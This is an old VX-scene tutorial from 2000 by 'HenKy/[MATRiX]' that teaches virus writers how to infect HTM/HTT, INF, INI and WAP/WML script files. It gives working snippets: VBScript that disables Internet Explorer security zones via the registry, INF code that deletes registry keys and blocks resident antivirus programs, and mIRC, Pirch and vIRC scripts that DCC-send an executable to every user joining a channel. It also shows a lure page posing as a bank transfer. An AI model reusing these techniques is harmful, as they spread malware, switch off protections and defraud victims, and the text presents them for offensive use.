-----------------------------------------------------------------------------------------------

                          <  SCRIPT INFECTION  >
                                 
                             _ UNDER WIN/WAP _
                
                            BY HenKy /[MATRiX]

-----------------------------------------------------------------------------------------------

 WELL, THIS IS MY VERY FIRST ARTICLE IN THE VX SCENE, IS VERY BASIC AND IF YOU 
 ARE A AVERAGE 
   
 CODER YOU CAN FIND IT STUPID BUT I HOPE IT WILL BE USEFULL FOR YOU AND YOUR 
 FUTURE VIRUSES. 

LET'S BEGIN:

 WHEN THE OLD DOS WAS THE KING THE PEOPLE USED TO EXECUTE TREE TYPES OF FILES:

  * EXE
  * COM
  * BAT

 THIS GIVE TO US A VERY LITTLE VARIATION AND THE MOST OF DOS VIRUSES WERE 
 COM-EXE APPENDERS

 BUT UNDER WINDOZE 95/98/NT/2000 OUR KINDY OS IS ABLE TO EXECUTE A HUGE VARIETY
 OF FILES, AND IF YOU HAVE EXPLORER 5 AND MICROSOFT OFFICE, THE POSSIBILITIES 
 ARE VERY BIG:

 * EXE
 * COM
 * BAT 
 * HTM (..)
 * HTT (HTM)
 * VBS (VISUAL BASIC SCRIPT)
 * INI (FOR EXAMPLE MIRC.INI)
 * INF (INF)
 * ASP (HTM)
 * DOC (WORD)
 * XML (EXTENDED HTM)
 * XLS (EXCEL)
 * PPT (POWERPOINT)
 * MSI (MICROSOFT INSTALLER)
 * MPP (MICROSOFT PROJECT)
 * LNK (SHORTCUTS ... YES ALSO)  

 (..) WIN98 COMES WITH A SCRIPTING HOST BUT SEEMS TO BE STUPID... AS USUAL..   

 AND IF YOU ADD COMPRESSED FILE TYPES YOU HAVE:
 
 * ARJ
 * ZIP
 * RAR
 * CAB
 * ACE
 * ARC
 * LHA
 * JAR (JAVA CLASSES ZIPPED)
 * SFX (RAR SELF-EXTRACTORS)



 YOUR SUPER W32/POLY/STEALTH/..ETC VIRUS 'WONT' BE GOOD IF  CANT INFECT SCRIPTS. 
 IT WILL MAKE YER VIRUS VERY POWERFULL AND IT WILL SPREAD VERY FAST.

 I DONT WANT TO EXPLAIN HERE MACRO INFECTION OR ZIP/RAR..ETC INFECTION. 

 THERE ARE A LOT OF GOOD TUTORIALS ABOUT THEY. I WILL TRY TO EXPLAIN SOME THINGS 

 ABOUT HTM, INF AND INI INFECTION BECAUSE THERE ARE THE MOST UNDOCUMENTED ONES 
 AND ALSO TALK ABOUT THE NEW GENERATION OF WAP PHONES THAT USES SCRIPT LANGUAGE.




-------------------------------------------------------------------------------------------------

THE HTM INFECTION:


 YES, THE HTM FILES ARE THE MOST USED FORMAT IN INTERNET TO DISPLAY WEB PAGES. 
 THEY HAVE A BIG POWER WHEN ARE VIEWED WITH INTERNET EXPLORER... THE MICROSUX 
 PRODUCT LET US TO USE JAVASCRIPTS

 AND VISUAL BASIC SCRIPTS ... ONLY THINK... 
 
 * REGISTRY MANIPULATION
 * FILE SYSTEM HANDLIND
   (OPEN, CREATE, RENAME, APPEND FILES ... ETC)
  
 EVERY TIME THAT YOU OPEN My Computer A HTT FILE IS EXECUTED AND IS THE SAME 
 FOR THE Windows
 
 My Documents , Desktop OR ANOTHER SPECIAL OR PERSONALIZATED FOLDER. 

 IN ORDER TO INFECT A HTM/HTT FILE YOU MUST ADD A CODE LIKE THIS:


 HTM CODE
 
--------------------------------------------------------------------------------

<html><body>
<script Language="VBScript"><!--
Set HELLO = CreateObject("WScript.Shell")
 HELLO.Regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1201" , 0, "REG_DWORD"
 HELLO.RegWrite"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1201" , 0, "REG_DWORD"
--></script>




THIS SILLY EXAMPLE DISABLES THE INTERNET SECURITY SETTINGS IN A FEW LINES OF 
CODE... WORTH NOT?

YOU CAN SEE ALSO A FILE HANDLING EXAMPLE:



<html><body>
<script Language="VBScript"><!--
Set FSO = CreateObject("Scripting.FileSystemObject")
Set ARCHO = FSO.CreateTextFile("C:\EXAMPLE.TXT", 2, False)
 ARCHO.WriteLine "HI"
 ARCHO.WriteLine "DUDE"
 ARCHO.Close  
   
Set READER = FSO.OpenTextFile("C:\EXAMPLE.TXT", 1, False)
 if READER.readline <> "HI" then
 READER.close()
  else
 
 'PUT HERE ANOTHER ACTION

 READER.close()  
--></script>

<SCRIPT LANGUAJE="JavaScript">
window.alert("HELLO");
</SCRIPT>


 THIS EXAMPLE CREATES A TEXT FILE, WRITES SOME CODE ON IT AND THEN CLOSE IT. 
 OPEN THE FILE

 AGAIN AND READ IT, IF THE READ TEXT IS EQUAL TO 'HI' CLOSES THE FILE, IF NOT 
 TAKE AN ACTION.

 FINALLY SHOW A MESSAGE BOX USING JAVA SCRIPT.


<html><body>
<script Language="VBScript"><!--
Set LINKA = WshShell.CreateShortcut("C:\WINDOWS\Favorites\FreeSex.Hypererotika.URL")
	LINKA.TargetPath = "http://pagina.de/HenKy"
	LINKA.Save
--></script>



 THIS EXAMPLE CREATES A LINK IN THE FAVORITES FOLDER TO A WEB PAGE (HEHEHEH...)

 YOU CAN CREATE A LINK ALSO TO A EXECUTABLE FILE.
 
 AND FINALLY YOU CAN USE HTM/VBS SCRIPTS TO USE THE MAPI... LOOK THE 
 MONOPOLY.WORM FROM ZULU.

 WELL I HOPE THOSE HTM EXAMPLES ARE DESCRIPTIVE FOR THE POSSIBILITIES THAT THE
 FILE TYPE

 OFFER US.

 

 THE INF INFECTION
 
--------------------------------------------------------------------------------

 I HAVE A LOT OF SUX INF FILES ON MY HD, THEY ARE STUPID AN UNUSEFUL, BUT WE 
 CAN GIVE THEY
 
 A NEW REASON OF LIVING....

(THX TO ULTRAS FOR THIS PIECE OF CODE)(MUST BE NAMED ULTRAS.INF)



[version]
signature="$CHICAGO$"
SetupClass=BASE

[DefaultInstall]
CopyFiles = Ultra.File
UpdateAutoBat = Patch.It

[Patch.it]
CmdAdd = "ECHO", "HI ULTRAS"

[DestinationDirs]
DefaultDestDir = 30 

[SourceDisksNames]
1="ULTRAS","",1

[Ultra.File]
TEST.TXT;



THIS CODE COPIES TEST.TXT TO C:\ AND WRITE SOME CODE TO AUTOEXEC.BAT



[Version]
Signature="$CHICAGO$"
Provider=%MSFT%

;[Version]
;Signature="$Windows NT$"   ;FOR WINDOWS NT
;Provider=%MS%

[Cleanup]
DelReg=ApmDelReg

[ApmDelReg]
HKLM,System\CurrentControlSet\Control\Biosinfo\APM,Attributes


 THIS EXAMPLE ERASES A REGISTRY KEY


Version]
Signature="$CHICAGO$"
Language=%codepage%
DriverVer=12/14/1999,5.00.2195.1

[BlockingVirusScanners]
Dr. Solomon's AntiVirus,%msg4%,              WFINDV32.EXE  , EXETYPE("WIN32"), FILESIZE(0x00028607)
F-Secure Anti-Virus,%msg7%,                  F-AGNT95.EXE  , COMPANYNAME("Data Fellows Ltd."), PRODUCTVERSION("98.06a")
F-Secure Antivirus for Windows 95,%msg7%,    DVP95_0.EXE   , COMPANYNAME("Data Fellows, Ltd."), PRODUCTVERSION("97.03a0")
Irus Virus Scanner,%msg2%,                   WIMMUN32.EXE  , EXETYPE("WIN32"), FILESIZE(0x0007EC04)
McAfee VShield,%msg1%,                       vshwin32.exe  , COMPANYNAME("Network Associates Inc"), PRODUCTVERSION("3.1.6")
QEMM 97,%msg5%,                              QLogo.exe     , COMPANYNAME(""), PRODUCTVERSION("9.0.001")
Norton AntiVirus 5,%msg6%,                   ARG("nav")    , NAVAPW32.EXE  , COMPANYNAME("Symantec Corporation"), PRODUCTVERSION("5.*")
Norton AntiVirus 6,%msg6%,                   NAVAPW32.EXE  , COMPANYNAME("Symantec Corporation"), PRODUCTVERSION("6.*")
Panda Antivirus,%msg8%,                      PAVSCHED.EXE  , EXETYPE("WIN32"), FILESIZE(0x00012C00)
Toshiba Disk Manager,%msg3%,                 DCKICK.EXE    , EXETYPE("WIN32"), FILESIZE(0x00004800)
Executive Software Diskeeper,%msg9%,         DKSERVICE.EXE , COMPANYNAME("Executive Software International"), PRODUCTVERSION("1, 0, 0, 1")



[Strings]
codepage=1252

msg1="McAfee VScan"
msg2="Detector de virus Irus"
msg3="Toshiba Disk Manager"
msg4="Antivirus Dr. Solomon"
msg5="QEMM 97"
msg6="Norton AntiVirus"
msg7="F-Protect de Data Fellows"
msg8="Panda Antivirus Platinum"
msg9="Executive Software Diskeeper"


 YEAH, THIS CODE IS ABLE TO BLOCK RESIDENT AV'S ... VERY USEFULL

 YOU CAN ALSO CREATE A AUTORUN.INF IN EACH DRIVE... IN W98 EVERY TIME THAT YOU 
 ACESS TO THE DRIVE USING THE EXPLORER YOU WILL EXECUTE YOUR VIRUS ... HEHEH...

 (YOU NEED TO MODIFY A PAIR OF THINGS IN THE REGISTRY , I CANT REMEMBER... )



 THE INI INFECTION
 
------------------------------------------------------------------------------------------------

 THIS PART OF THIS ARTICLE WILL BE DEDICATED TO THE INI INFECTION OF THE MOST 
 USED IRC PROGRAMS:

 MIRC, PIRCH AND VIRC.



[script] 	  
n0=ON 1:JOIN:#: {/if ($nick==$me) { halt }  
n1=/dcc send $nick c:\winnt\notepad.exe 
n2=}



THIS PROCEDURE SENDS A NOTEPAD.EXE TO ALL PEOPLE THAT JOIN YOUR MIRC CHANNEL


[Levels]
Enabled=1
Count=1
Level1=MAIN

[MAIN]
User1=FUCKER
UserCount=1
Event1=;HI DUDE
Event2=ON JOIN:#:/dcc send $nick c:\HOLA.eXe
EventCount=2


THIS PROCEDURE SENDS A .EXE TO ALL PEOPLE THAT JOIN YOUR PICH CHANNEL

Name FUCK
// Events
Event JOIN "* JOIN"
DCC Send $nick c:\HI_HELL.ExE
EndEvent

 THIS PROCEDURE SENDS A .EXE TO ALL PEOPLE THAT JOIN YOUR VIRC97 CHANNEL

 YES, VERY EASY TO IMPLEND AND MAKE OUR VIRUS MORE INFECTIOUS... HE HEH HE ... 

 THE DESKTOP.INI, SYSTEM.INI AND WIN.INI ARE USEFULL TO MODIFY.



------------------------------- SCRIPTS: THE FUTURE --------------------------------------------

  WELL, THE COMPUTER INDUSTRY IS GROWING MORE AND MORE, AND NOW THERE ARE PHONES
  ABLE TO CONNECT TO THE I-NET AND SEE VERY SIMPLY AND TINY WEB PAGES AND ALSO 
  VERY TINY MONOCHROME BITMAPS.

 ARE THE CALLED WAP PHONES. THEY USES A SCRIPT LANGUAGE VERY SIMILAR TO XML , 
 THE WML.
 
 THE WAP HAVE SOME FUNTIONS, AND ONE OF HIS FUNCTIONS IS DECIDE WHICH IS THE 
 URL THAT IT WILL OPEN WHEN THE PHONE IS TURNED ON. IN THIS WAY WE CAN MAKE A 
 WORM THAT CAN BE DOWNLOADED

 FROM A URL AN GET KEEPED IN THE CACHE OF THE PHONE....  ONLY THE BEGGINING....

 NO INFECTIVE CODE AVALIABLE NOW (IN RESEARCHING PROGRESS USING THE UP-SDK THAT 
 COMES WITH A
  
 UP_WAP SIMULATOR WITH DEBUG CONSOLE )


 THE SCRIPTS ARE VERY SIMPLY AS YOU CAN SEE:

<?xml version="1.0"?>
<!DOCTYPE wml PUBLIC "-//PHONE.COM//DTD WML 1.1//EN"
			"http://www.phone.com/dtd/wml11.dtd" >

<!--  THIS CODE CALLS TO A PHONE NUMBER  -->

<wml>
    <card>
	<do  type="accept" label="Call">
	    <go  href="wtai://wp/mc;$(number)"/>
	</do> 
    	<p>
	    Enter phone number: 
		<input  name="number" format="NNNNNNN*N"/>
	</p>
    </card>
</wml>
 
 
<!--  THIS CODE   SHOWS A SILLY MESSAGE -->


<?xml version="1.0"?> 
<!DOCTYPE wml PUBLIC "-//WAPFORUM//DTD WML 1.1//EN" 
    "http://www.wapforum.org/DTD/wml_1.1.xml"> 
<wml> 
    <card> 
     <p> 
        Hello, Unwired World! 
     </p> 
    </card> 
</wml> 


<!--  THIS CODE   SHOWS A SMILE -->

<wml>
<card> 
  <p>
    Here's a smiley: 
  </p>
    <br/><img alt=":-)" localsrc="smileyface" src=""/>
</card>
</wml> 

<!-- YEAH!!! THIS CODE TRANSFER 1000$ TO THE COUNT 666... IMPRESSIVE NOT ? 
10 LINES OF CODE -->

<WML>
 <DO TYPE="ACCEPT">
 <GO HREF="HTTP://WWW.BANKINTER.COM/TRANSFER.CGI
 $ACNT=1000&ACCT=666"/>
 </DO>
 <CARD>
 <P>
 PRESS OK TO TALK WITH HOT TEENS :)
 </P>


<!-- Sendmail via UP.Mail passing To, Subj, & MessageText variables --> 

<wml> 
    <card title="SendMail"> 
     <do type="accept" label="Send"> 
         <spawn href="device:home/goto?svc=Email&amp;
          SUB=sendMsg"> 
            <setvar name="TO" value="ULTRAS2@HOTMAIL.COM"/> 
            <setvar name="SUBJ" value="THE [MATRiX] SUCCES!"/> 
            <setvar name="MT" value="WE CAN DO IT!"/> 
         </spawn> 
     </do> 
      <p> 
         Press Send to send email. 
      </p> 
    </card> 
</wml> 

 WHO SAYS THAT SCRIPTS ARE LAME??? ARE THE FUTURE... IS FUNNY CODE IN ASM BUT 
 WE CAN DO IT BETTER
 
 ASM + SCRIPT = GREAT!

 FOR MORE INFO VISIT:
   
   http://www.wapforum.org
   http://www.phone.com
   http://www.uplanet.com   ; TO DOWNLOAD THE UP EMULATOR (ABOUT 10 MEGABYTES)
  

 I HAVE THE UP DEV GUIDE (ABOUT 1 MB COMPRESSED) AVALIABLE ON REQUEST.


  HenKy_@LATINMAIL.COM

       04/16/2000